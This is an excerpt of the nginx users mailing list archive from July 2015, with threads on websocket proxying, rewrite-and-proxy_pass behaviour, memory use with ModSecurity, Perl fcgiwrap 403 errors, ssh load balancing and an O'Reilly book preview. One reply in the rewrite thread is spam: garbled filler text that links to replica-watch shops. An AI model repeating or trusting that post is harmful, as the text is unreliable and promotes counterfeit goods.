feel that nginx might not be proxying the response correctly either due to incorrect response or bad config. Can someone help me out with debugging this? A lot of places where I see this issue, usually the proxy does not support the websocket handshake which causes the handshake to fail. Appreciate the help! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260651,260651#msg-260651 From edigarov at qarea.com Thu Jul 30 15:40:50 2015 From: edigarov at qarea.com (Gregory Edigarov) Date: Thu, 30 Jul 2015 18:40:50 +0300 Subject: tell nginx to stay inside same location? In-Reply-To: References: <55BA3B6D.8080404@qarea.com> Message-ID: <55BA4582.8060001@qarea.com> On 07/30/2015 06:02 PM, Edho Arief wrote: > On Thu, Jul 30, 2015 at 11:57 PM, Gregory Edigarov wrote: >> Hello, >> >> is that possible to tell nginx to stay inside the same location after >> rewrite rule is done? >> >> i.e. I have: >> >> location /njs/ { >> proxy_pass http://localhost:5501; >> ...... >> } >> >> now, if i need to cut off /njs/ part, i added the following: >> location /njs/ { >> rewrite /njs(.*) $1; >> proxy_pass http://localhost:5501; >> .......... >> } >> >> but, that doesn't work, because my uri has changed and nginx goes to the >> default location, which I don't need. >> >> what could I do in this situation? >> > if only you have read the documentation... > > http://nginx.org/r/proxy_pass > > ... > When the URI is changed inside a proxied location using the rewrite > directive, and this same configuration will be used to process a > request (break): > > location /name/ { > rewrite /name/([^/]+) /users?name=$1 break; > proxy_pass http://127.0.0.1; > } > > In this case, the URI specified in the directive is ignored and the > full changed request URI is passed to the server. > ... > thank you very very much. I've read the docs, but skipped the break completely, somehow. From mdounin at mdounin.ru Thu Jul 30 17:31:43 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 30 Jul 2015 20:31:43 +0300 Subject: does it normal? In-Reply-To: <7252849dbd532e9f9807ee605e23e563.NginxMailingListEnglish@forum.nginx.org> References: <7252849dbd532e9f9807ee605e23e563.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150730173143.GX19190@mdounin.ru> Hello! On Thu, Jul 30, 2015 at 04:07:05AM -0400, evgeni22 wrote: > my server info: > > Processor Intel Xeon E3 1225v2 > RAM 32GB DDR3 > Disks 3 x 120 GB SSD > > i run directadmin+nginx > > the nginx use 14gb of 32gb and this output from server: > > root 12872 0.0 38.8 12868180 12748776 ? Ss 09:35 0:00 nginx: > master process /usr/sbin/nginx -c /etc/nginx/nginx.conf > nginx 12873 0.0 38.8 12889524 12759540 ? S 09:35 0:00 nginx: > worker process > nginx 12882 0.0 38.8 12876504 12756964 ? S 09:35 0:00 nginx: > worker process > nginx 12883 0.0 38.8 12879652 12757656 ? S 09:35 0:00 nginx: > worker process > nginx 12884 0.0 38.8 12872432 12753532 ? S 09:35 0:00 nginx: > worker process > > when i do restart to nginx service it take 2min 40second to restart. > after restart it immediately use 14gb of ram > > does it normal for nginx? No, but depending on your settings and compiled in modules it may be what you've asked it to do. -- Maxim Dounin http://nginx.org/ From mdounin at mdounin.ru Thu Jul 30 17:45:19 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 30 Jul 2015 20:45:19 +0300 Subject: Websocket handshake failing In-Reply-To: <879cb06ad3573d1c1bd1e2353d6e34fe.NginxMailingListEnglish@forum.nginx.org> References: <879cb06ad3573d1c1bd1e2353d6e34fe.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150730174518.GY19190@mdounin.ru> Hello! On Thu, Jul 30, 2015 at 11:19:32AM -0400, nightcrawler wrote: > I'm trying to enable websocket communication between client and server and > have nginx as proxy. Ive applied the following congiguration changes to > websocket sites-enabled conf to allow for websocket proxy: > proxy_set_header Upgrade $http_upgrade; > proxy_set_header Connection "upgrade"; > proxy_set_header X-Forwarded-For $http_x_forwarded_for; > proxy_set_header Host $http_host; > proxy_pass http://mywebsite; > > Although the server receives the Connection: Upgrade header and responds > with aConnection: Upgrade header as expected, the client gets only > Connection: keep-alive and I see the following error on js-console > > WebSocket connection to 'wss://mywebsite.dev/cometd/' failed: Error during > WebSocket handshake: 'Connection' header value must contain 'Upgrade' > > I feel that nginx might not be proxying the response correctly either due to > incorrect response or bad config. > > Can someone help me out with debugging this? A lot of places where I see > this issue, usually the proxy does not support the websocket handshake which > causes the handshake to fail. Connections upgrades are supported by nginx proxy starting with nginx 1.3.13. Make sure you are using recent enough version, not something from Debian oldstable. You also need to configure nginx properly. Detailed documentation can be found here: http://nginx.org/en/docs/http/websocket.html In the config snippet you've provided at least "proxy_http_version 1.1;" seems to be missing. If the above won't help, consider looking at nginx debugging logs. See here for some basic hints: http://nginx.org/en/docs/debugging_log.html -- Maxim Dounin http://nginx.org/ From igor at sysoev.ru Thu Jul 30 19:18:38 2015 From: igor at sysoev.ru (Igor Sysoev) Date: Thu, 30 Jul 2015 22:18:38 +0300 Subject: tell nginx to stay inside same location? In-Reply-To: <55BA3B6D.8080404@qarea.com> References: <55BA3B6D.8080404@qarea.com> Message-ID: On 30 Jul 2015, at 17:57, Gregory Edigarov wrote: > Hello, > > is that possible to tell nginx to stay inside the same location after rewrite rule is done? > > i.e. I have: > > location /njs/ { > proxy_pass http://localhost:5501; > ...... > } > > now, if i need to cut off /njs/ part, i added the following: > location /njs/ { > rewrite /njs(.*) $1; > proxy_pass http://localhost:5501; > .......... > } > > but, that doesn't work, because my uri has changed and nginx goes to the default location, which I don't need. > > what could I do in this situation? Just add slash in upstream: location /njs/ { proxy_pass http://localhost:5501/; ...... } -- Igor Sysoev http://nginx.com From igor at sysoev.ru Thu Jul 30 19:34:23 2015 From: igor at sysoev.ru (Igor Sysoev) Date: Thu, 30 Jul 2015 22:34:23 +0300 Subject: =?UTF-8?Q?Free_O=E2=80=99Reilly_animal_book_about_nginx?= Message-ID: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> Nearly 20 years ago I read my first O?Reilly book, Learning Perl. Back then I never would have dreamed O?Reilly would someday publish a book written about the software I created, yet here we are today. I am honored to announce that later this year O?Reilly Media will publish one of their iconic animal books entitled nginx: A Practical Guide to High Performance, and I?m delighted to offer you a preview edition download today. This five chapter preview covers: * How to install nginx * How to use nginx as a software load balancer * How to set up nginx as a reverse proxy for serving dynamic web applications * How to tune nginx for optimal performance and security * And more! I hope you enjoy the book. -- Igor Sysoev http://nginx.com -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Thu Jul 30 20:11:52 2015 From: nginx-forum at nginx.us (evgeni22) Date: Thu, 30 Jul 2015 16:11:52 -0400 Subject: does it normal? In-Reply-To: <20150730173143.GX19190@mdounin.ru> References: <20150730173143.GX19190@mdounin.ru> Message-ID: <53f8e589ded7fe4f00686da747106020.NginxMailingListEnglish@forum.nginx.org> nginx version: nginx/1.8.0 built by gcc 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) built with OpenSSL 1.0.1e-fips 11 Feb 2013 TLS SNI support enabled configure arguments: --add-module=../modsecurity_nginx-2.8.0/nginx/modsecurity --user=nginx --group=nginx --prefix=/usr --sbin-path=/usr/sbin --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid --http-log-path=/var/log/nginx/access_log --error-log-path=/var/log/nginx/error_log --with-ipv6 --without-mail_imap_module --without-mail_smtp_module --with-http_ssl_module --with-http_realip_module --with-http_stub_status_module --with-http_gzip_static_module --with-http_dav_module --with-cc-opt=''-D FD_SETSIZE=32768'' CentOS Linux release 7.1.1503 error.log 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity for nginx (STABLE)/2.8.0 (http://www.modsecurity.org/) configured. 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: APR compiled version="1.5.1"; loaded version="1.5.1" 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: PCRE compiled version="8.20 "; loaded version="8.20 2011-10-21" 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: LIBXML compiled version="2.9.2" 2015/07/30 09:34:28 [notice] 12683#0: Original server signature: ModSecurity Standalone 2015/07/30 09:34:28 [notice] 12683#0: Status engine is currently disabled, enable it by set SecStatusEngine to On. other errors from time to time: kernel: grsec: From x.x.x.x: Segmentation fault occurred at 00000000000000e0 in /usr/sbin/nginx[nginx:8031] uid/euid:993/993 SELINUX=disabled at the moment: - Memory used.........: 13761 MB / 32067 MB - Swap in use.........: 2333 MB service nginx reload = it doubles the ram usage. over a few days it use all 32gb of ram, and start with swap. nginx.conf #user nginx; # The number of worker processes is changed automatically by CustomBuild, according to the number of CPU cores, if it's set to "1" worker_processes 4; pid /var/run/nginx.pid; error_log /var/logs//nginx/error.log; #error_log logs/error.log notice; #error_log logs/error.log info; events { include /etc/nginx/nginx-events.conf; } http { include /etc/nginx/mime.types; # access_log /var/log/nginx/access.log main; # For user configurations not maintained by DirectAdmin. Empty by default. include /etc/nginx/nginx-includes.conf; # Supplemental configuration include /etc/nginx/nginx-modsecurity-enable.conf; include /etc/nginx/nginx-defaults.conf; include /etc/nginx/nginx-gzip.conf; include /etc/nginx/directadmin-ips.conf; include /etc/nginx/directadmin-settings.conf; include /etc/nginx/nginx-vhosts.conf; include /etc/nginx/directadmin-vhosts.conf; } Average total traffic out from server is 41.1 kb/s. on 12 vhosts/domains. So what do i start with to find the problem? Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260644,260659#msg-260659 From igal at lucee.org Thu Jul 30 20:12:00 2015 From: igal at lucee.org (Igal @ Lucee.org) Date: Thu, 30 Jul 2015 13:12:00 -0700 Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?= In-Reply-To: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> Message-ID: <55BA8510.5020702@lucee.org> this is awesome news! congrats!!! the download link is broken though (404). Igal Sapir Lucee Core Developer Lucee.org On 7/30/2015 12:34 PM, Igor Sysoev wrote: > > Nearly 20 years ago I read my first O?Reilly book, Learning Perl. > Back then I never would have dreamed O?Reilly would someday publish > a book written about the software I created, yet here we are today. > > > I am honored to announce that later this year O?Reilly Media will > publish one of their iconic animal books entitled > nginx: A Practical Guide to High Performance, > and I?m delighted to offer you a preview editiondownload today > . > This five chapter preview covers: > > > * How to install nginx > > * How to use nginx as a software load balancer > > * How to set up nginx as a reverse proxy for serving dynamic web > applications > > * How to tune nginx for optimal performance and security > > * And more! > > > I hope you enjoy the book. > -- > Igor Sysoev > http://nginx.com > > > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx -------------- next part -------------- An HTML attachment was scrubbed... URL: From mdounin at mdounin.ru Thu Jul 30 20:39:26 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Thu, 30 Jul 2015 23:39:26 +0300 Subject: does it normal? In-Reply-To: <53f8e589ded7fe4f00686da747106020.NginxMailingListEnglish@forum.nginx.org> References: <20150730173143.GX19190@mdounin.ru> <53f8e589ded7fe4f00686da747106020.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150730203926.GD19190@mdounin.ru> Hello! On Thu, Jul 30, 2015 at 04:11:52PM -0400, evgeni22 wrote: > nginx version: nginx/1.8.0 > built by gcc 4.8.3 20140911 (Red Hat 4.8.3-9) (GCC) > built with OpenSSL 1.0.1e-fips 11 Feb 2013 > TLS SNI support enabled > configure arguments: > --add-module=../modsecurity_nginx-2.8.0/nginx/modsecurity --user=nginx > --group=nginx --prefix=/usr --sbin-path=/usr/sbin > --conf-path=/etc/nginx/nginx.conf --pid-path=/var/run/nginx.pid > --http-log-path=/var/log/nginx/access_log > --error-log-path=/var/log/nginx/error_log --with-ipv6 > --without-mail_imap_module --without-mail_smtp_module --with-http_ssl_module > --with-http_realip_module --with-http_stub_status_module > --with-http_gzip_static_module --with-http_dav_module --with-cc-opt=''-D > FD_SETSIZE=32768'' > > CentOS Linux release 7.1.1503 > > error.log > 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity for nginx (STABLE)/2.8.0 > (http://www.modsecurity.org/) configured. > 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: APR compiled > version="1.5.1"; loaded version="1.5.1" > 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: PCRE compiled > version="8.20 "; loaded version="8.20 2011-10-21" > 2015/07/30 09:34:28 [notice] 12683#0: ModSecurity: LIBXML compiled > version="2.9.2" > 2015/07/30 09:34:28 [notice] 12683#0: Original server signature: ModSecurity > Standalone > 2015/07/30 09:34:28 [notice] 12683#0: Status engine is currently disabled, > enable it by set SecStatusEngine to On. [...] > So what do i start with to find the problem? First of all, recompile nginx without ModSecurity. -- Maxim Dounin http://nginx.org/ From sarah at nginx.com Thu Jul 30 20:40:39 2015 From: sarah at nginx.com (Sarah Novotny) Date: Thu, 30 Jul 2015 13:40:39 -0700 Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?= In-Reply-To: <55BA8510.5020702@lucee.org> References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> <55BA8510.5020702@lucee.org> Message-ID: <1FFF5F2B-FB8B-495C-B4AA-1CA6E0544A13@nginx.com> > On Jul 30, 2015, at 1:12 PM, Igal @ Lucee.org wrote: > > this is awesome news! congrats!!! > > the download link is broken though (404). It?s been fixed :) sarah -------------- next part -------------- An HTML attachment was scrubbed... URL: From shahzaib.cb at gmail.com Thu Jul 30 20:51:15 2015 From: shahzaib.cb at gmail.com (shahzaib shahzaib) Date: Fri, 31 Jul 2015 01:51:15 +0500 Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?= In-Reply-To: <1FFF5F2B-FB8B-495C-B4AA-1CA6E0544A13@nginx.com> References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> <55BA8510.5020702@lucee.org> <1FFF5F2B-FB8B-495C-B4AA-1CA6E0544A13@nginx.com> Message-ID: Whoops, http://prntscr.com/7yzccl That's great btw :) On Fri, Jul 31, 2015 at 1:40 AM, Sarah Novotny wrote: > > On Jul 30, 2015, at 1:12 PM, Igal @ Lucee.org wrote: > > this is awesome news! congrats!!! > > the download link is broken though (404). > > > It?s been fixed :) > > sarah > > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From al-nginx at none.at Thu Jul 30 21:13:24 2015 From: al-nginx at none.at (Aleksandar Lazic) Date: Thu, 30 Jul 2015 23:13:24 +0200 Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?= In-Reply-To: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> Message-ID: <3ef73479336715f2aadc77c53e6dd5b4@none.at> Hi Igor. Am 30-07-2015 21:34, schrieb Igor Sysoev: >> >> Nearly 20 years ago I read my first O?Reilly book, Learning Perl. >> Back then I never would have dreamed O?Reilly would someday publish >> a book written about the software I created, yet here we are today. >> >> I am honored to announce that later this year O?Reilly Media will >> publish one of their iconic animal books entitled >> nginx: A Practical Guide to High Performance, >> and I?m delighted to offer you a preview edition download today [1]. Congratulations. When I think back ~10 Years ago I'm sure you have not thought that nginx could be THAT popular, haven't you ;-). Thank you that you have started to create nginx. Best regards Aleks From nginx-forum at nginx.us Thu Jul 30 23:44:28 2015 From: nginx-forum at nginx.us (George) Date: Thu, 30 Jul 2015 19:44:28 -0400 Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?= In-Reply-To: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> Message-ID: <8aae2aaa95bccfa3cf56a8368ab4eef8.NginxMailingListEnglish@forum.nginx.org> thanks Igor and Nginx ! Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260658,260666#msg-260666 From lists at ruby-forum.com Fri Jul 31 01:37:04 2015 From: lists at ruby-forum.com (Mikutems Bolly) Date: Fri, 31 Jul 2015 03:37:04 +0200 Subject: tell nginx to stay inside same location? In-Reply-To: <55BA3B6D.8080404@qarea.com> References: <55BA3B6D.8080404@qarea.com> Message-ID: To produce a longer message brief that check out is just not completed but in relation to face in addition to instance a finish. That check out is often as customary interested in shots for the look at becoming more common earlier than it is always visually fantastic. Which means people will present picture and many more graphics belonging to the view someday, nevertheless hardly right this moment. Whatever we can easily reassure a person is actually that your portion is normally remarkable including a sharp proof associated with genital herpes virus treatments obtain in cases where it is easy to devote the particular money intended for this acquire. http://www.waxwatchreplicas.co.uk http://www.waxwatchreplicas.co.uk/replica-breitling-watches-sale-for-uk.html http://www.waxwatchreplicas.co.uk/replica-cartier-watches-sale-for-uk.html -- Posted via http://www.ruby-forum.com/. From edigarov at qarea.com Fri Jul 31 08:07:55 2015 From: edigarov at qarea.com (Gregory Edigarov) Date: Fri, 31 Jul 2015 11:07:55 +0300 Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?= In-Reply-To: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> Message-ID: <55BB2CDB.1060902@qarea.com> On 07/30/2015 10:34 PM, Igor Sysoev wrote: > > Nearly 20 years ago I read my first O?Reilly book, Learning Perl. > Back then I never would have dreamed O?Reilly would someday publish > a book written about the software I created, yet here we are today. > > > I am honored to announce that later this year O?Reilly Media will > publish one of their iconic animal books entitled > nginx: A Practical Guide to High Performance, > and I?m delighted to offer you a preview editiondownload today > . > This five chapter preview covers: > > > * How to install nginx > > * How to use nginx as a software load balancer > > * How to set up nginx as a reverse proxy for serving dynamic web > applications > > * How to tune nginx for optimal performance and security > > * And more! > > > I hope you enjoy the book. > Thank you, but the download doesn't start on my Firefox. -------------- next part -------------- An HTML attachment was scrubbed... URL: From maxim at nginx.com Fri Jul 31 08:18:10 2015 From: maxim at nginx.com (Maxim Konovalov) Date: Fri, 31 Jul 2015 11:18:10 +0300 Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?= In-Reply-To: <55BB2CDB.1060902@qarea.com> References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> <55BB2CDB.1060902@qarea.com> Message-ID: <55BB2F42.8070907@nginx.com> Hi, [...] > Thank you, but the download doesn't start on my Firefox. > Check your mailbox instead. You should receive a link to the preview. -- Maxim Konovalov http://nginx.com From mark.mielke at gmail.com Fri Jul 31 08:52:10 2015 From: mark.mielke at gmail.com (Mark Mielke) Date: Fri, 31 Jul 2015 04:52:10 -0400 Subject: =?UTF-8?Q?Re=3A_Free_O=E2=80=99Reilly_animal_book_about_nginx?= In-Reply-To: <55BB2F42.8070907@nginx.com> References: <06EA10A9-4041-4237-97EA-B6F331BF86CF@sysoev.ru> <55BB2CDB.1060902@qarea.com> <55BB2F42.8070907@nginx.com> Message-ID: I requested it a few days ago. It was a little confusing. The link was circular... You get a link to request a copy which gets you a link to request a copy. But the email had a pdf attachment and that was the book if I recall correctly... I really like nginx and the thinking of the people behind it. Thank you! On Jul 31, 2015 4:18 AM, "Maxim Konovalov" wrote: > Hi, > > [...] > > Thank you, but the download doesn't start on my Firefox. > > > Check your mailbox instead. You should receive a link to the preview. > > -- > Maxim Konovalov > http://nginx.com > > _______________________________________________ > nginx mailing list > nginx at nginx.org > http://mailman.nginx.org/mailman/listinfo/nginx > -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 31 12:55:44 2015 From: nginx-forum at nginx.us (youradds) Date: Fri, 31 Jul 2015 08:55:44 -0400 Subject: Perl + fcgi + nginx - what am I doing wrong? Message-ID: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org> Hi, I've already got a live + dev site running under nginx and perl (with fcgi), but I can't for the life of me work out why its not working this time around. I've setup a new dev server. I wont bore you with all of the details, but suffice to say I have installed (via apt-get); sudo apt-get update && sudo apt-get upgrade sudo apt-get install nginx sudo apt-get install php5-cli php5-cgi spawn-fcgi php-pear sudo apt-get install mysql-server php5-mysql sudo apt-get install fcgiwrap The OS is Debian 8.1. I have then configured my site, using: server { listen 80; server_name site.net.net www.site.net.net; access_log /srv/www/site.net.net/logs/access.log; error_log /srv/www/site.net.net/logs/error.log; root /srv/www/site.net.net/www; location / { index index.html index.htm; } location ~ \.php$ { try_files $uri =404; include /etc/nginx/fastcgi_params; fastcgi_pass 127.0.0.1:9000; fastcgi_index index.php; fastcgi_param SCRIPT_FILENAME /srv/www/site.net.net/www$fastcgi_script_name; } location ~ \.cgi$ { try_files $uri =404; gzip off; include /etc/nginx/fastcgi_params; fastcgi_pass unix:/var/run/fcgiwrap.socket; fastcgi_index index.cgi; fastcgi_param SCRIPT_FILENAME /srv/www/site.net.net/www/cgi-bin/$fastcgi_script_name; } } I've sym-linked the config files into sites-enabled, so that its visible on nginx. I then rebooted nginx, and tried: index.html - works fine index.php - works fine index.cgi - 403 error I managed to fumble my way through it last time, but I can't figure out what I did different (I know it was a real pig to get configured the first time around) Any suggestions from the experts? (appologies for the formatting of this post - can't figure out how to do markup?) TIA Andy Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260678#msg-260678 From nginx-forum at nginx.us Fri Jul 31 14:55:10 2015 From: nginx-forum at nginx.us (youradds) Date: Fri, 31 Jul 2015 10:55:10 -0400 Subject: Perl + fcgi + nginx - what am I doing wrong? In-Reply-To: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org> References: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org> Message-ID: <50a2307d24fd239427715cd17d0a0c2c.NginxMailingListEnglish@forum.nginx.org> FWIW - this is what I get when I run it via SSH: root at server:/var/run# perl /srv/www/site.net/www/index.pl Content-Type: text/html FOO ...yet I get a 403 in the browser (and nothing in the site error_log) TIA Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260681#msg-260681 From francis at daoine.org Fri Jul 31 16:00:40 2015 From: francis at daoine.org (Francis Daly) Date: Fri, 31 Jul 2015 17:00:40 +0100 Subject: Perl + fcgi + nginx - what am I doing wrong? In-Reply-To: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org> References: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org> Message-ID: <20150731160040.GB23844@daoine.org> On Fri, Jul 31, 2015 at 08:55:44AM -0400, youradds wrote: Hi there, > I've already got a live + dev site running under nginx and perl (with fcgi), > but I can't for the life of me work out why its not working this time > around. What is shown when you "diff" the working old nginx.conf and the failing new nginx.conf? Do the old and new use the same fastcgi server? Are there any differences in the fastcgi server config? > location ~ \.cgi$ { > try_files $uri =404; > gzip off; > include /etc/nginx/fastcgi_params; > fastcgi_pass unix:/var/run/fcgiwrap.socket; > fastcgi_index index.cgi; > fastcgi_param SCRIPT_FILENAME > /srv/www/site.net.net/www/cgi-bin/$fastcgi_script_name; > } > index.html - works fine > index.php - works fine > index.cgi - 403 error What file on your filesystem do you want the fasctcgi server to process when you request this index.cgi? -- your server layout. What SCRIPT_FILENAME value(s) does nginx send to your fastcgi server? -- nginx debug logs, or watch the traffic. (Does your fastcgi server even use SCRIPT_FILENAME? -- your fastcgi server documentation.) Is SCRIPT_FILENAME set in your /etc/nginx/fastcgi_params? f -- Francis Daly francis at daoine.org From jwyman at taos.com Fri Jul 31 17:05:22 2015 From: jwyman at taos.com (Jerry Wyman) Date: Fri, 31 Jul 2015 17:05:22 +0000 Subject: ssh load-balancing Message-ID: Hi, I?m new to nginx and am trying to load-balance ssh sessions to an autoscaling group of ECS instances in AWS. Having trouble getting my config files right. I don?t get any errors on startup, but my access.logs shows this lines for each attempt and the command line gives me this : ssh ec2-user at 10.172.60.7 ssh_exchange_identification: Connection closed by remote host Access.log: 10.172.200.18 - - [31/Jul/2015:15:54:15 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-" 10.172.200.18 - - [31/Jul/2015:16:25:31 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-" 10.172.200.18 - - [31/Jul/2015:16:34:31 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-" Any direction would be appreciated. Thanks, Jerry Jerome (Jerry) Wyman Technical Consultant (207) 751-6613 Jwyman at taos.com This communication is Confidential Information. By using this message and attachments you implicitly consent to terms and conditions set forth at http://www.taos.com/email_disclaimer. If you do not consent or received this message in error, please destroy it. -------------- next part -------------- An HTML attachment was scrubbed... URL: From nginx-forum at nginx.us Fri Jul 31 17:51:25 2015 From: nginx-forum at nginx.us (youradds) Date: Fri, 31 Jul 2015 13:51:25 -0400 Subject: Perl + fcgi + nginx - what am I doing wrong? In-Reply-To: <20150731160040.GB23844@daoine.org> References: <20150731160040.GB23844@daoine.org> Message-ID: <5579fe6bfcff7bf08570ba3c8bbe0fb9.NginxMailingListEnglish@forum.nginx.org> Hi Fancis, Thanks for the reply! > What is shown when you "diff" the working old nginx.conf and the failing > new nginx.conf? Not a huge amount tbh. The live one has: pid /var/run/nginx.pid; and new dev has: pid /run/nginx.pid; New one has: ## # SSL Settings ## ssl_protocols TLSv1 TLSv1.1 TLSv1.2; # Dropping SSLv3, ref: POODLE ssl_prefer_server_ciphers on; ..extra. ..and the old one has this extra (all commented out, mind); # gzip_types text/plain text/css application/json application/x-javascript text/xml application/xml application/xml+rss text/javascript; ## # nginx-naxsi config ## # Uncomment it if you installed nginx-naxsi ## #include /etc/nginx/naxsi_core.rules; ## # nginx-passenger config ## # Uncomment it if you installed nginx-passenger ## #passenger_root /usr; #passenger_ruby /usr/bin/ruby; > Do the old and new use the same fastcgi server? Are there any differences > in the fastcgi server config? Both the same by the looks of it: root at steamdev2:~# service fastcgi --version service ver. 0.91-ubuntu1 root at steampunkjlinode:~# service fastcgi --version service ver. 0.91-ubuntu1 > Do the old and new use the same fastcgi server? Are there any differences > in the fastcgi server config? Do you mean the etc/init.d/fcgiwrap file? There were a few differents in it (mostly comments). I tried copying the same one over from live, but didn't seem to make a difference > What file on your filesystem do you want the fasctcgi server to process > when you request this index.cgi? -- your server layout. The layout is: /srv/www/site.net/logs/ /srv/www/site.net/www/ /srv/www/site.net/www/cgi-bin The .cgi/.pl stuff is all going to be in /cgi-bin - but for testing purposes, I've just stuck it at root level (so I can try out and see if I can get it working at the most basic level) The script in question would be found /srv/www/site.net/www/index.cgi, and I would expect it to work/run at http://site.net/index.cgi With regards to /etc/nginx/fastcgi_params settings - here are the values of them: LIVE (working) ONE: http://pastebin.com/QMHKGkJX NEW ONE: http://pastebin.com/G72Ds9aA Hopefully that answers everything :) Cheers Andy Posted at Nginx Forum: http://forum.nginx.org/read.php?2,260678,260684#msg-260684 From mdounin at mdounin.ru Fri Jul 31 17:53:29 2015 From: mdounin at mdounin.ru (Maxim Dounin) Date: Fri, 31 Jul 2015 20:53:29 +0300 Subject: ssh load-balancing In-Reply-To: References: Message-ID: <20150731175329.GG19190@mdounin.ru> Hello! On Fri, Jul 31, 2015 at 05:05:22PM +0000, Jerry Wyman wrote: > I?m new to nginx and am trying to load-balance ssh sessions to > an autoscaling group of ECS instances in AWS. > > Having trouble getting my config files right. I don?t get any > errors on startup, but my access.logs shows this lines for each > attempt and the command line gives me this : > > ssh ec2-user at 10.172.60.7 > > ssh_exchange_identification: Connection closed by remote host > > Access.log: > > 10.172.200.18 - - [31/Jul/2015:15:54:15 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-" > > 10.172.200.18 - - [31/Jul/2015:16:25:31 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-" > > 10.172.200.18 - - [31/Jul/2015:16:34:31 +0000] "SSH-2.0-OpenSSH_6.2" 400 173 "-" "-" "-" > > Any direction would be appreciated. Looks you are trying to balance ssh connections using http module. This won't work, as http is only able to balance http requests, not arbitrary connections. If you want to balance ssh connections, try using the stream module instead: http://nginx.org/en/docs/stream/ngx_stream_core_module.html https://www.nginx.com/resources/admin-guide/tcp-load-balancing/ The stream module is designed to balance arbitrary connections, and should work for you. > This communication is Confidential Information. By using this > message and attachments you implicitly consent to terms and > conditions set forth at http://www.taos.com/email_disclaimer. If > you do not consent or received this message in error, please > destroy it. By posting to this list you've agreed that the message will be publicly available. If you want your messages to be confidential, please consider using commercial support, see https://www.nginx.com/support/. -- Maxim Dounin http://nginx.org/ From zipper1790 at gmail.com Fri Jul 31 18:18:25 2015 From: zipper1790 at gmail.com (Erick Ocrospoma) Date: Fri, 31 Jul 2015 13:18:25 -0500 Subject: Perl + fcgi + nginx - what am I doing wrong? In-Reply-To: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org> References: <9512422fb5dc1e25ca32c4f521629c43.NginxMailingListEnglish@forum.nginx.org> Message-ID: Hi, On 31 July 2015 at 07:55, youradds wrote: > Hi, > > I've already got a live + dev site running under nginx and perl (with > fcgi), > but I can't for the life of me work out why its not working this time > around. I've setup a new dev server. I wont bore you with all of the > details, but suffice to say I have installed (via apt-get); > > sudo apt-get update && sudo apt-get upgrade > sudo apt-get install nginx > sudo apt-get install php5-cli php5-cgi spawn-fcgi php-pear > sudo apt-get install mysql-server php5-mysql > sudo apt-get install fcgiwrap > > The OS is Debian 8.1. > > I have then configured my site, using: > > server { > > listen 80; > > server_name site.net.net www.site.net.net; > access_log /srv/www/site.net.net/logs/access.log; > error_log /srv/www/site.net.net/logs/error.log; > root /srv/www/site.net.net/www; > > location / { > index index.html index.htm; > } > > location ~ \.php$ { > try_files $uri =404; > include /etc/nginx/fastcgi_params; > fastcgi_pass 127.0.0.1:9000; > 